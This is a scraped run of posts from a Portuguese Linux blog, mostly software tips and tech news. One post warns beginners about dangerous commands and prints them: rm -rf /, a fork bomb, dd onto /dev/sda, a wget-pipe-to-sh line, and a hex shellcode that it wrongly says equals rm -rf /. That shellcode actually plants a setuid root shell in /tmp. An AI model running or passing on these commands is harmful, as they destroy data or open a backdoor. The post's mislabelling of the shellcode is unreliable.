TuxGuitar - Escreva partituras para guitarra compatíveis com o GuitarPRO no Linux

Quem é músico, ou aspirante a músico, pode encontrar no TuxGuitar uma excelente ferramenta para criar partituras das suas músicas favoritas e quem sabe, compor a próxima "Stairway to Heaven".

TuxGuitar




O TuxGuitar é uma alternativa livre e grátis para criar e editar partituras musicais, incluindo arquivos exportados do GuitarPRO, PowerTab e TablEdit, programas famosos deste segmento.
Leia também: Como instalar o MuseScore no Ubuntu
A interface do programa não deve ser problemática, até para inexperientes, todos os botões informam suas funções quando você repousa o mouse sobre eles,  simples e organizada, na tela inicial é exibida uma página com a visão da partitura e tablatura, onde ambas podem ser editadas.
Leia também: Efeitos de guitarra no Linux com o Guitarix
Algumas ferramentas estão na parte parte superior da tela e abaixo ficam as pistas e o braço da guitarra que exibe as casas e as cordas tocadas. Apesar de ter um foco maior em guitarras, você também pode usar o TuxGuitar para outras coisas. É possível criar partituras para outros instrumentos de cordas e até mesmo bateria. O TuxGuitar permite montar os arranjos de uma música completa com seus principais instrumentos: baixo, guitarra, bateria.
Leia também: Aplicativos para músicos pelo Wine no Linux
O programa é leve e não exige grandes recursos de hardware, como requisito, é preciso ter o Java instalado no computador.

Você pode fazer o download diretamente do site oficial do TuxGuitar ou diretamente do SourceForge.

Dica: Ao baixar e extrair o programa, você encontrará um arquivo SH dentro dele, ele só vai funcionar se você tiver informado ao seu gestor de arquivos para tratar ele como executável e perguntar para você se você quer rodar o programa. No caso do Ubuntu (Nautilus), vá até as configurações do gestor e na aba de comportamento, marque a opção para perguntar para executar arquivos de texto, assim quando você der dois cliques, basta clicar no executar.
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




segunda-feira, 30 de janeiro de 2017

Vineyard - Uma alternativa ao PlayOnLinux para trabalhar com o Wine

Você está procurando uma nova forma de trabalhar com o Wine para rodar aplicações do Windows dentro do Linux? Bom, se você não se deu bem com o Wine puro, com o PlayOnLinux, ou com o CrossOver, talvez o Vineyard seja a sua saída.

Vineyard




O Vineyard é uma aplicação que coloca uma camada de abstração em cima do Wine, assim como o PlayOnLinux e o CrossOver, facilitando a instalação e configuração do Wine e de seus complementos.

Uma pergunta inevitável de se fazer é: O Vineyard é melhor que o PlayOnLinux?

A resposta é não. Mas não entenda mal, ele também é não "pior", mas sim diferente, inclusive, você pode usar ambos de forma complementar se achar necessário. O Vineyard consegue ler as suas bottles do CrossOver e os prefixos do POL que você já tiver no seu computador, o que é algo bem legal e muito útil.

O Vineyard é, acima de tudo, simples de entender, todas as opções do programa ficam dispostas em um menu com sessões do lado esquerdo, com tudo o que você vai precisar para configurar as suas aplicações.

Vineyard

A quantidade de complementos disponíveis para instalação não é tão vasta quanto a do PlayOnLinux, mas tem todo o básico para rodar aplicações, sendo que você também pode usar o programa para instalar e configurar DLLs, configurar o registro, entre outras coisas.

Wine configurações

Outra coisa interessante que o Vineyard tem, é a opção de habilitar patches de otimização para o Wine de uma forma bem simples com caixas de marcar, um ponto negativo é que, ao contrário do POL (PlayOnLinux), o Vineyard não permite que você gerencie versões diferentes do Wine através dele, algo pode ser útil para criar prefixos diferentes para cada aplicação.

Como instalar o Vineyard no Ubuntu e no Linux Mint?


Este programa necessita da adição de um PPA para funcionar, e na verdade, temos duas opções, a versão estável, mais antiga, e a versão de testes, com recursos mais recentes, porém, possivelmente instável.

Estável: ppa:cybolic/ppa

Instável: ppa:cybolic/vineyard-testing


Quem prefere fazer pelo terminal, pode fazer assim:

- Versão estável:
sudo add-apt-repository ppa:cybolic/ppa -y && sudo apt update && sudo apt install vineyard -y
- Versão instável:
sudo add-apt-repository ppa:cybolic/vineyard-testing -y && sudo apt update && sudo apt install vineyard -y
Lembrando que o Vineyard depende do Wine para funcionar, então é necessário que o Wine tenha sido instalado previamente, você encontra ele no repositório de qualquer uma das distros, se quiser uma a versão mais recente do Wine, consulte este tutorial.

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




Entrevistamos os desenvolvedores do Stoq, um programa de gestão comercial grátis disponível para Linux

Hoje você vai conhecer melhor o Stoq, um ERP grátis e de código aberto que você pode usar no Linux para gerenciar toda a sua empresa.

Programa para gestão comercial grátis - Stoq




O Stoq pode ser uma ótima solução para você que é micro, pequeno e até mesmo, médio, empresário. Você pode gerenciar toda da sua loja através dele, incluindo gerenciamento de estoque, vendas e até mesmo emissão de notas fiscais. O mais interessante disso tudo é que o Stoq é gratuito, ou seja, você não precisa gastar recursos da sua empresa para utilizá-lo e ainda pode rodá-lo em alguma distribuição Linux, para evitar ainda mais gastos, ficar dentro da legalidade e melhorar a segurança.



A entrevista foi feita com Cainã D'ajuda, membro da equipe do Stoq, você pode saber mais sobre o programa consultando os seguintes links:


Nos links acima você consegue fazer o download, tanto do programa, quanto do código fonte, além de ter acesso à versão com suporte pago do Stoq, caso você deseje.

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




quinta-feira, 26 de janeiro de 2017

A vida de quem desenvolve games fora do Brasil - DioCast #23

Eu gosto muito de acompanhar o cenário de games, especialmente o lado do desenvolvedor, mesmo sem ser um, acho a profissão muito interessante. No episódio de hoje do DioCast, vamos conversar com alguns desenvolvedores brasileiros residentes no Canadá que nos contaram um pouco da vida de que trabalha diretamente com a produção de games e tira seu sustento disso.

Vida de desenvolvedor




Neste episódio do DioCast nós conversamos com o pessoal da empresa Bitten Toast Games Inc. Uma empresa formada por brasileiro que moram atualmente no Canadá e que desenvolve games para a plataforma PC e estão trabalhando com jogos de realidade virtual.

Site: http://bittentoast.com

Games da empresa:

Rocket Fist: https://goo.gl/l5zt8i

What the Box?: https://goo.gl/7tTx7v

Spacecats with Lasers (VR): https://goo.gl/t1KhT4



Se você está acompanhando os DioCasts pelo blog, deve ter reparado que nós pulamos um episódio, isso é porque o episódio 22 do DioCast é uma episódio especial, mais longo, de retrospectiva com vários convidados especiais, você pode conferir aqui.

E aí, já pensou em sair do país também para trabalhar? Conte pra gente nos comentários e até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




Crie grupos de Apps na barra do Unity no Ubuntu com o LauncherFolders

Apesar da barra do Unity trabalhar muito bem com vários aplicativos, você pode querer agrupá-los, da mesma forma com que você faz no Android ou no iOS, veja como fazer utilizando a versátil aplicação, LauncherFolders.

Launcher Folders




Este programa é muito versátil e tem vários opções que você pode usar para criar grupos de aplicativos. Mas antes de falarmos mais dele, o primeiro passo é você instalá-lo no seu Ubuntu com Unity. Para isso, acesse o site oficial e baixe o pacote .deb de lá, instale dando dois cliques.

Leia também: Crie grupos de Apps no Gnome Shell

Depois de instalado, você vai encontrar o aplicativo "Unity Launchers Folders" na Dash do Unity, abrindo ele você terá acesso a criação e manipulação das suas "gavetas" de Apps e atalhos.

Unity Folders

Você pode clicar no botão de "mais" para criar as pastas, depois basta arrastar os ícones do menu para ela, escolhendo o nome que você bem entender. Há também a possibilidade de você criar atalhos com pastas do sistema e até mesmo links de sites do Google Chrome e do Firefox, basta arrastas os atalhos para o janela do programa.


É uma ferramenta bem eficaz, não? Faça o teste.

Até a próxima! :)
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




7 comandos perigosos do Linux que você NUNCA deve executar

Como o número de usuários leigos de Linux vem aumentando com o tempo, acho pertinente alertar as pessoas sobre alguns comandos que podem ser perigosos, tanto para o sistema, quanto para os dados contidos no computador.

7 Comandos perigosos do mundo Linux




O terminal é uma ferramenta muito poderosa, por conta disso é bom você dominá-lo, ou pelo menos entendê-lo, para evitar problemas no seu sistema baseado em Linux.
Veja também: O curso no Diolinux EAD para aprender a dominar o terminal
Os grandes problemas que você pode enfrentar usando o terminal de forma indiscriminada normalmente estão atrelados a comandos de sobrescrita de dados, então vamos mostrar alguns aqui que você deve prestar especial atenção quando vir alguém sugerindo que você faça no seu computador com Linux.

Atenção: Você NÃO deve executar nenhum destes comandos no seu computador, isso pode causar danos irreversíveis que nós não nos responsabilizamos, o artigo tem a intenção de ser instrutivo, justamente para evitar este tipo de situação.

1 - rm -rf


É um comando clássico do do Linux que teoricamente não faz nada de mais, ele serve apenas para apagar arquivos, e é aí que mora o perigo. Dependendo da forma que ele for aplicativo o resultado pode ser muito desagradável, por isso é importante você entender o que os comandos fazem, vamos explicar um pouco melhor neste exemplo:
- rm: comando usado no Linux para deletar arquivos.
- rm -r: o comando deleta pastas recursivamente, mesmo que a pastas esteja vazia.
- rm -f: cUsando este parâmetro, o propriedade de "apenas leitura" que um arquivo tenha é removida sem perguntar, permitindo que o arquivo seja apagado.
- rm -rf / : Usando a combinação dos dois parâmetros com a "/" você diz para o sistema apagar tudo que está no diretório raiz do sistema.
- rm -rf * : Força o apagamento de tudo que está no diretório atual ou no de trabalho, dependendo de onde você estiver.
- rm -rf . : Acrescentando um ponto, você pode apagar também as pastas ocultas, além das normais.

Tome muito cuidado ao executar um comando destes, especialmente se for feito como root ou usando o sudo.


Tão perigoso que pode ser este comando, que atualmente o Linux se protege contra ele, se você rodá-lo, mesmo com sudo ou como root, ele não vai funcionar, para isso é preciso usar os parâmetros descritos na imagem acima. Da mesma forma que o Linux protege você de destruir o sistema sem querer, ele também permite que você o destrua mediante a ter certeza de que é realmente isso que você quer, curioso, não é?

2 - :(){:|:&};:


Este comando funciona como uma "Fork Bomb", ele opera definindo uma função chamada ':', que se chama duas vezes, uma vez em primeiro plano e outra em segundo plano, o processo se repete indefinidamente até que o sistema trave.

3 - qualquer comando para > /dev/sda


A forma com que o Linux lê as partições e discos é diferente do Windows, por conta disso, normalmente novatos não conseguem entender em primeira instância como eles são distribuídos. Normalmente a localização dos dispositivos de armazenamento do sistema ficam dentro de /dev, sendo que podem haver vários por ali e normalmente o sda está presente.

O problema do comando acima é que ele redireciona a saída de qualquer comando que seja colocado para o seu bloco de armazenamento, desta foma sobrescrevendo alguns dados e corrompendo outros.

4 - mv pasta/diretório /dev/null


Eu costumava brincar sobre o /dev/null me referindo a ele como o "buraco negro" do Linux. Tudo que é enviado para ele é perdido "para sempre". Então tome cuidado ao mover qualquer coisa para esta localização. O comando mv serve para mover arquivos ou diretórios para o destino indicado, se este destino for o /dev/null você estará mandando seus arquivos pra Nárnia.

5 - wget http://malicious_source -O- | sh


Este comando vai aparecer para você instalar alguns programas. O wget é o programa responsável por fazer o download da URL que vem logo após, ele é bem útil para baixar arquivos em geral, o problema está no arquivo que ele baixa e na sequência do comando  que o executa no caso dele ser um shell script. Só baixe arquivos desta forma de fontes que você considera confiáveis e se estiver na dúvida, baixe apenas o arquivo de shell, eliminando qualquer parâmetro que apareça após o link, assim você pode abrir ele em um editor de texto de sua preferência e verificar o que há dentro dele.

6 - dd if=/dev/random of=/dev/sda


Assim como o ítem 3 da nossa lista, o grande problema aqui é o destino ser o /dev/sda. Tome cuidado. O comando dd pode ser muito útil para copiar arquivos e até mesmo partições inteiras, como no exemplo 6, mas se a saída for um outro disco, tome cuidado, pois o resultado irá sobrepor os dados lá existentes.

7 - Comandos disfarçados


Como eu comentei à princípio, o terminal é uma ferramenta poderosa, se você não dominá-lo, é bom ter cuidado com que você for rodar nele, se o você não fala a língua do terminal, saiba que ele fala muitas outras. O comando abaixo nada mais é do que o comando indicado no primeiro item da nossa lista, só que em forma hexadecimal.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″ “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″ “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″ “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;

Ele tem o mesmo propósito do famigerado "rm -rf /", por isso, não rode coisas no terminal que você não sabe para quem servem, existem muito conteúdo grátis a internet para você estudar sobre e até mesmo alguns bons cursos pagos, como é o caso do "Dominando o Terminal" aqui do blog mesmo, mas em linhas gerais, se você evitar colocar comandos que você não sabe para que servem direito, os problemas já serão minimizados. 

Agora espalhe este conhecimento para ajudar mais pessoas a ficarem precavidas sobre estes pequenos percalços da vida computacional.

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




quarta-feira, 25 de janeiro de 2017

Como remover objetos de uma imagem no GIMP "magicamente"

O GIMP possui muitos recursos interessantes, um dos que eu mais gosto é o "Heal Selection", uma ferramenta que permite remover objetos de uma imagem de forma "miraculosa". Aprenda a fazer.

Heal Selection no GIMP




O filtro "Heal Selection" faz parte de um pacote de plugins extras do GIMP, então você precisa adicioná-lo, o nome dele é plugin-registry.

Você pode encontrar ele pelo gerenciador de aplicativos preferido, no Ubuntu você pode usar o Synaptic, ou fazer pelo terminal:
sudo apt install gimp-plugin-registry 
Depois de instalado, abra o GIMP e você verá que existem novas opções de efeitos no seu GIMP, aliás, este é um ponto forte do programa, você pode incrementar os recursos do editor através de complementos e plugins (normalmente grátis), fica aqui uma dica extra para você, dê uma olhada no nosso post "17 Dicas para você turbinar o GIMP". 

Heal Selection


Hoje vou mostrar para você uma dos recursos mais legais do GIMP na minha opinião, o Heal Selection. Como comentei antes, você precisa instalar o complemento do Plugin-Registry para ter acesso a ele. Mas...

O que ele faz?

Basicamente, ele permite que você remova objetos de uma imagem preenchendo o fundo de forma automática, baseando-se no material em torno da seleção.

O primeiro passo é selecionar o objeto que você quer remover, para isso você pode usar qualquer ferramenta de seleção. Como neste exemplo eu quero remover uma nuvem, selecionei a ferramenta de seleção elíptica e desenhei um círculo em torno dela.

Para usar o "Heal Selection", vá até o menu Filtros>>Realçar>>Heal selection...

Heal Selection no GIMP

Vai se abrir uma janela te dando algumas opções, sinta-se à vontade para explorar as opções que você tem ali até encontrar o melhor resultado, normalmente o padrão já traz um resultado interessante, neste caso, basta dar "OK".

Heal Selection

Aguarde a aplicação do Filtro e você automaticamente verá o resultado, como na imagem abaixo:

Heal Selection, resultado no GIMP

Dependendo da complexidade do fundo, o resultado não será o ideal, mas mesmo assim não deixa de ser um efeito interessante. Combinando ele com outros efeitos do editor o resultado será excelente.

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




segunda-feira, 23 de janeiro de 2017

Clear Linux da Intel agora integra o Microsoft Azure também

Mais uma distribuição Linux entra para o hall de opções que a Microsoft oferece no Azure Marketplace, trata-se do Clear Linux, da Intel.

Clear Linux no Azure




A Microsoft anunciou que mais uma distribuição Linux está disponível para os clientes da empresa no Azure, trata-se do Clear Linux, uma distribuição não tão conhecida pelo público, pertencendo a Intel.

O Clear Linux é utilizado normalmente para Enterprise, por conta disso é que talvez ele não apareça tanto na mídia comum, nós falamos recentemente sobre ele numa tentativa da Intel de melhorar os drivers de vídeo do Linux para a Steam.

Existem 3 formas diferentes de disponibilidade do Clear Linux no Azure:

– No formato Docker;

– Uma máquina virtual que pode ser usada como ponto de partida para quem quer explorar e criar um sistema com pacotes de sua escolha;

– Uma imagem voltada para machine learning com ferramentas com código aberto comumente usadas neste campo.

Para acessar a página do Marketplace do Azure onde você encontra o Clear Linux, basta clicar aqui.

_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




Kdenlive para Windows é lançado oficialmente

Na semana passada eu postei um vídeo no canal do blog Diolinux mostrando o Kdenlive, ainda em fase de testes, rodando no Windows, mas parece que a fase inicial de testes passou rápido e agora você já pode usar o que é considerada uma versão estável do programa.

Kdenlive on Windows


A versão 16.12.1 do Kdenlive foi lançada há alguns dias e junto com ela nasceu a versão para Windows do aplicativo, isso pode permitir que a aplicação alcance mais usuários, até então, este excelente editor (que nós usamos para produzir o canal inclusive) estava disponível somente para Linux e Mac (via MacPorts).



O download da versão atualizada do programa para todas as plataformas podem ser feito através da página de downloads oficiais do Kdenlive, preste atenção, pois na versão do Windows é necessário baixar também o FFMpeg, conforme as instruções que você encontra na página de download também.
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




quinta-feira, 19 de janeiro de 2017

Absurdo! Governo gasta quase 340 mil reais em computadores da Apple

O Superior Tribunal de Justiça (STJ) do Brasil confirmou hoje a licitação para compra de 12 iMacs, o computador All in One da Apple, pela "bagatela" de 339 mil reais. São cerca de 28 mil reais por computador.

iMacs do Governo




Parece que a crise financeira é só pra gente mesmo, o povo! Enquanto isso... o que você faria com 339 mil reais? Quitaria todas as suas dúvidas e quem sabe até compraria uma apartamento? Um carro? Talvez uma dezena de carros?

Algumas pessoas preferem comprar 12 computadores.

Os produtos da Apple tem muita qualidade, todos sabemos, mas no Brasil os preços são surreais, ainda assim, se você, COM O SEU DINHEIRO, decidir comprar um deles, eu não tenho o direito de falar muito, mas quando um órgão público usa o NOSSO dinheiro de impostos (que não são poucos) para gastar de uma forma que qualquer pessoa que entenda um mínimo de informática sabe que é completamente desnecessária, aí nós temos um GRANDE problema meu amigo.


O preços exorbitantes incluem a garantia estendida de 36 meses para os dispositivos. A configuração escolhida pelo STJ contempla um Intel Core i7 quad-core de 4.0 GHz, 32 GB de memória RAM DDR3 e SSD de 256 GB. Além disso, eles possuem tela Retina de 27 polegadas e resolução 5K, assim como GPU AMD Radeon R9 M395X com 4 GB de Vram.

Se você pegar os 339 mil propostos e dividir por 12, você vai ver que cada máquina sai por 28 mil reais. O mais curioso é que a máquina mais cara que a Apple vende em seu site nos modelos de iMac custa "apenas" 17 mil, porém, de fato ela é inferior a este modelo pretendido pelo STJ. Acredito que ela tenha alguns adicionais, como uma placa de vídeo com mais memória, além do suporte estendido e os acessórios....

Ah é! Esqueci de comentar, além dos iMacs, a licitação cobre também um Magic Mouse 2 e um Magic Keyboard para cada computador, afinal de contas, por que usar um teclado e mouse mais "barato"? Tipo um da Razer, né? (a que ponto chegamos?)

Agora vem a melhor parte...


A "justificativa" para comprar um iMac com tela retina com resolução 5k é: "os iMac possuem melhor performance na edição de imagens em alta resolução".

Minha reação ao ficar sabendo dessa licitação de iMacs


E espera que a licitação para comprar o Photoshop para editar as imagens em alta resolução ainda nem saiu. 😒

Será que só eu sou o gênio que percebeu que você consegue editar imagens com uma máquina muito, MAS MUITO, menos poderosa do que isso? Você conhece alguém (fora da Pixar) que consegue usar 32 GB de RAM para editar uma imagem? Amigo... nem que estivesse jogando BF1 ao mesmo tempo!

Fora isso... o dinheiro, é o nosso dinheiro! Dinheiro nosso sendo gasto com algo que é possível resolver sem custo algum usando Linux! Ou mesmo gastando MUITO menos usando Windows. Não tenho nada contra a Apple, o problema nem está nela, neste aspecto ao menos, tirando os valores, mas será que o mínimo a se fazer numa situação como esta não seria estudar a solução mais barata e eficaz para contornar a situação?

Só sei que precisamos de um "Lava Bits" nesse país, ou no mínimo alguém mais consciente no ramo da tecnologia, já chega o nosso "querido" Kassab querendo limitar a internet. Pode ter certeza que tem muita grana sendo gasta com licenças com coisas que poderiam ser resolvidas de outra forma.

_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




Microsoft informa usuários que Windows 7 não é mais seguro

Sempre que uma notícia sobre segurança na tecnologia sai, ainda mais quando o cerne é a falta dela, as pessoas costumam se preocupar, algumas menos informadas até começam a conspirar e literalmente, entrar em pânico. Quando isso acontece com um dos sistemas operacionais que tem uma das maiores fatias de mercado desktop, certamente você deve prestar atenção, ainda que você não o utilize.

Run to The Hills Windows




A Microsoft publicou em seu blog oficial em alemão a recomendação incisiva de migração para o Windows 10, sobretudo para quem tem Windows 7, informando que, apesar do suporte do sistema estender-se até 2020, a arquitetura de segurança para qual ele foi projetada já é obsoleta, sendo que a solução é migrar para o novo Windows, "obviamente".

A notícia deixou muitas pessoas preocupadas, então eu fiz um vídeo para esclarecer melhor a situação e também mostrar as opções que você, que não deseja migrar para o Windows 10, tem.

Confira:



A urgência para a migração para o Windows 10 está muito mais na ânsia da Microsoft de querer uma maior base instalada em sua nova versão do Windows do que o fato do Windows 7 ser menos seguro, até porque, como consumidor, se o suporte será até 2020, ele deverá ser o mais seguro possível e receber atenção da empresa até lá, pelo menos é o que você deve cobrar, caso seja usuário.

Como comentei no vídeo, uma das piores coisas que pode acontecer com uma empresa, é ela ficar presa a uma tecnologia defasada. Tendo isso em mente, comece a procurar soluções que sejam multiplataforma preferencialmente, se possível de código aberto para facilitar a adaptação, caso seja preciso e por que não, se você não curtiu o Windows 10, comece a testar distribuições Linux, no vídeo eu deixei algumas sugestões de distros que podem atender as necessidades da maior parte das empresas.

Fique tranquilo, você ainda tem alguns anos para decidir, mas é bom ir testando as possibilidades e pensando no futuro.

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




Correios serão a mais nova operadora de celular do Brasil

Os Correios estão se preparando para entrar no mercado de telefonia no próximo mês, Fevereiro, além de trabalhar com as suas correspondências, agora os Correios também querem atender você como operadora.

Correios telefonia Brasil





A "Correios Celular", será lançada em Fevereiro de 2016 (nem tô de zoeira, é esse o nome mesmo!) e será focada em atender as classes C e D da sociedade. Segundo as informações, a ideia é oferecer como diferencial um plano "simples e fácil de entender, aliado à confiança que a marca tem pelo público". 

Com 12 mil agências espalhadas por todo o Brasil, a adoção deverá ser acelerada. Na primeira fase da implantação do projeto serão oferecidos apenas planos pré-pagos, sendo que a aquisição do chip e a recarga do mesmo poderão ser feitos diretamente nas agências dos Correios. A meta é atingir cerca de 1 milhão de usuários até o final do ano.

Mesmo com o público alvo definido em pessoas de menor renda, a Correios Celular não quer concorrer com as outras operadoras:
"Nossos diferenciais serão a simplicidade, a transparência para o cliente e a proximidade, com as nossas agências. E queremos promover a cidadania, levando inclusão digital e social para as classes D e E", revela Ara Minassian, coordenador do projeto Correios Celular.
E aí, você acha que vai dar certo? Vai virar cliente?_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




Microsoft atualiza versão Alfa do Skype para Linux

A versão nova do Skype para Linux, com visual mais moderno e baseada em Electron recebeu um atualização que corrigiu alguns problemas e adicionou novas funções, confira:





O desenvolvimento da nova versão do Skype para Linux continua firme e forte, embora ainda não tenhamos alguns recursos que seria úteis, como o programa ainda está em fase alpha, isto é compreensível.

A versão 1.16 do Skype para Linux (Alpha) chega com correções de bugs para versão anterior. Algumas das modificações mais interessantes são:

- Atualização para Electron 1.4.10
- Menu de contexto ativado com comandos de copiar/colar na área de entrada de mensagens
- Adição da opção de autostart (Tools-> Launch at Login)
- Adição da opção de inicialização minimizada (Tools->Launch Minimized)
- Aprimoramentos menores e correção de bugs

- Uso de teclas de atalho com a tecla Alt

Você pode baixar esta versão do Skype em formato .deb e .rpm diretamente do site oficial da comunidade Skype. Se você já tem o Skype Alpha instalado, basta atualizar o seu sistema.

Fonte: aqui e aqui.
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




O que fazer depois de instalar o Fedora 25

O Fedora 25 foi lançado há algumas semanas e nós temos um ótimo material para compartilhar com você que gosta desta distribuição. O Fedora é um pouco menos user friendly do que o Ubuntu e o Linux Mint, sendo que a utilização do terminal é praticamente obrigatória para fazer todos os procedimentos de pós instalação, mas isso não quer dizer que seja mais difícil e menos satisfatório, confira agora as principais dicas para você deixar o seu novo Fedora 25 "redondinho".

Fedora 25 pós instalação




O vídeo que você vai ver foi preparado pelo Renato Araujo no canal Oficina do Tux, nosso parceiro, confira agora as dicas dadas por ele:


Sintetizando os passos nos temos:

1 - Atualizar o sistema
sudo dnf update
2 - Drivers de Vídeo (Nvidia) no Fedora

3 -  Fedy

Estas são as principais ferramentas e passos para você deixar o Fedora 25 pronto para o seu uso, para baixar essa nova versão do Fedora acesse este artigo.

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




quarta-feira, 18 de janeiro de 2017

ttf-mscorefonts-installer erro no Ubuntu, veja como resolver.

Recentemente o pacote de instalação de fontes ttf do Ubuntu corrompeu seus links fazendo com que os usuários recebem a mensagem de erro que indica uma falha no pacote "ttf-mscorefonts-installer", ainda que as fontes em si estejam instaladas, veja agora como resolver este problema.

ttf-mscorefonts-installer erro no Ubuntu



Este é um erro relativamente simples de resolver, é provável que a Canonical conserte o problema em breve, mas se você não quiser esperar e ainda de quebra, remover essa janelinha chata do seu sistema, vamos fazer alguns procedimentos.

Basicamente, o problema é o pacote com links errados, aparentemente as fontes mudaram de endereço e o pacote ficou obsoleto, mas podemos usar um pacote deb empacotado por outra distro para contornar a situação, no caso o Debian.

Corrigindo o problema


Você pode resolver instalando este pacote .deb, recomendo remover o ttf-mscorefonts-installer atualmente instalado, mas isso não chega a ser essencial, a instalação pode demorar um pouco mais que o normal, pois é necessário instalar várias fontes e fazer o download das mesmas.

Se você preferir fazer pelo terminal, é possível também, assim você consegue acompanhar detalhadamente a evolução do processo:
sudo apt purge ttf-mscorefonts-installer
wget http://ftp.de.debian.org/debian/pool/contrib/m/msttcorefonts/ttf-mscorefonts-installer_3.6_all.deb -P ~/Downloads
sudo apt install ~/Downloads/ttf-mscorefonts-installer_3.6_all.deb
Rode um comando por vez, aguarde o término da ação e problema resolvido.

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




Os 3 temas de ícones mais bonitos para Linux

Uma das coisas mais legais das distros Linux (pode incluir até o Android aqui) é que tudo é muito personalizável, e isso, obviamente, incluem os temas de ícones. Hoje eu vou mostrar para você os temas que eu considero serem os melhores.

Top 3 Icon Packs for Linux




Um bom tema de ícones pode dar uma vitalidade extra para o seu desktop e quando se trata do desenvolvimento de temas de ícones para Linux, existem 3 equipes que dão um verdadeiro show.

1 - Moka


Moka icons para Linux

Certamente um belo conjunto, com ícones arrendondados, lembrando muito os padrões mobiles, especialmente os usados no iPhone e nos celulares da Xiaomi.

Acesse o site para baixar o tema. Nós temos um tutorial de instalação para ele também, basta clicar aqui para ver.

2 - Numix


Ícones Numix

Os temas Numix tem muitas variações, uma das mais populares é a "Circle", mas existem outras opções que você encontra no site oficial.  Os ícones Numix Circle, como o nome sugere, usam formatos arrendondados para todas as artes, com um tema flat muito agradável.

Veja aqui o nosso tutorial para instalar o tema.

3 - Paper


Paper Icon Theme

Este é o tema que eu venho utilizando atualmente, na verdade, venho utilizado uma variação que eu mesmo fiz chamada Paper Orange Diolinux, o tema é inspirado no material design da Google e os ícones são muito bem desenhados. Você pode acessar o site oficial para saber as novidades sobre ele.

Confira aqui o nosso tutorial para instalação deste tema.


Claro que temas são puramente pessoais, então sinta-se à vontade para compartilhar nos comentários os temas que você mais gosta.

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




sábado, 14 de janeiro de 2017

Os 3 melhores aplicativos de Dock para Linux

Você gostar de utilizar docks para organizar a sua área de trabalho e agilizar a sua produtividade? Então hoje você vai conhecer os que eu considero serem os 3 melhores aplicativos para essa finalidade. Confira:

Dock Apps para Linux




Existem vários aplicativos para essa finalidade, mas na minha opinião, 3 deles se destacam. Se você quiser utilizar algum deles, independente da interface que você use, certamente eles vão agilizar o seu trabalho.

1 - Cairo Dock

Cairo Dock

Eu usava muito o Cairo Dock antigamente, até por que, ele é muito mais do que um "simples dock", o Cairo Dock consegue prover uma interface gráfica praticamente completa, tanto que ao instalar ele você encontrará na sua tela de login uma sessão Cairo Dock. De longe, ele é o mais pesado dos 3 deste post, mas também é o que talvez tenha mais opções de configuração e plugins para aumentar as suas funções.

Você encontra ele no repositório de praticamente todas as distribuições Linux, basta consultar a central de aplicativos.

2 - Plank

Plank Dock Linux

Se o Cairo Dock é cheio de recursos e pode ser até complexo, dependendo do seu ponto de vista, o Plank Dock, com origem no projeto do elementary OS é o contrário. Ele é extremamente simples, porém, funcional. Nele você encontrará todos os aspectos básicos do funcionamento de um aplicativo de dock.

No Plank você encontra, assim como no Cairo Dock, funções de ocultamento e comportamento, suporte para temas e animações e posição na área de trabalho.

O Plank também está nos repositórios de praticamente todas as distros, basta procurar por ele na sua Central de aplicativos, ou instalar pelo terminal.

3 - Docky

Docky

O Docky é o meu terceiro colocado, ele é muito mais parecido com o Plank do que com o Cairo, mas tem algumas funções a mais se comparado com o Plank. Ele é tão leve quanto o Plank e pode ser uma boa alternativa também, ele tem muitos temas disponíveis que você encontra na internet.

Mais uma vez, você o encontra na Central de Aplicativos da sua distribuição, ou pode fazer a instalação via terminal.

E aí, tem mais algum que você goste e não está na lista? Adicione a sua sugestão nos comentários! :)

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




quinta-feira, 12 de janeiro de 2017

10 aplicativos open source que você pode utilizar no Windows e no Linux

Eu acho muito interessante o fato de que programas de código aberto que começaram apenas no mundo Linux ganharam versões para outras plataformas, como Windows e Mac, isso aproxima muito as coisas e faz com que as pessoas possam transitar livremente entre as plataforma, o que é algo muito positivo.

10 open source apps




